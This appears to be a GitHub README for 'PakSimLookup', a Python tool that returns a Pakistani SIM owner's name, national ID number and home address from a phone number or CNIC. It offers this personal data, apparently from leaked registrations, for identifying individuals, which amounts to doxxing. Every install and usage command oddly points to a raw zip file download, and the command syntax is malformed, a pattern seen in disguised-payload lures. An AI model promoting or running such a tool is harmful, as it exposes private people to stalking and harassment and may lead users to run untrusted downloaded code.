Skip to content

PakSimLookup is a Python tool designed to extract information using a mobile number (starting with 0) or a CNIC (without dashes). It provides details such as Mobile Number, Name, CNIC, and Address, aimed at identifying individuals and addressing abusive behavior or misconduct.

Notifications You must be signed in to change notification settings

mwaseemsarwar/PakSimLookup

Β 
Β 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

24 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ PakSimLookup

πŸ“Œ Overview

PakSimLookup is a Python-based tool designed to extract information using either a mobile number (starting with 0) or a CNIC (without dashes). It provides details such as πŸ“± Mobile Number, 🏷️ Name, πŸ†” CNIC, and 🏠 Address. This tool is intended to assist in identifying individuals and addressing abusive behavior or misconduct.

image

⚠️ Disclaimer

The author of this tool is not responsible for any misuse or illegal activities carried out using this tool. It is solely the responsibility of the user to ensure compliance with local laws and regulations. This tool is intended for ethical use only.

🌟 Features

  • πŸ” Fetch details using a mobile number (must start with 0 and be 11 digits long).
  • πŸ” Fetch details using a CNIC (without dashes and exactly 13 digits long).
  • πŸ’Ύ Provides Information of SIM Owners Registered in or Before 2020.

πŸ“‹ Requirements

  • 🐍 Python 3.x

πŸ“₯ Installation

  1. Clone the repository:
    git clone https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip
  2. Navigate to the tool’s directory:
    cd PakSimLookup
  3. Install dependencies:
    pip install -r https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip

πŸ› οΈ Usage

Run the following commands from your terminal:

πŸ†˜ For help

python3 https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip --help

πŸ“² Using Mobile Number

python3 https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip --number 03001234567

πŸ†” Using CNIC

python3 https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip --cnic 1234512345671

πŸ“Š Example Output

image

βš–οΈ Legal Disclaimer

PakSimLookup is provided "as is" without any guarantees or warranties. Users are strictly prohibited from using this tool for illegal activities, including but not limited to unauthorized access to private information. By using this tool, you agree to take full responsibility for your actions.

🀝 Contribution

🌟 Contributions are welcome! Feel free to fork the repository and submit pull requests.

About

PakSimLookup is a Python tool designed to extract information using a mobile number (starting with 0) or a CNIC (without dashes). It provides details such as Mobile Number, Name, CNIC, and Address, aimed at identifying individuals and addressing abusive behavior or misconduct.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%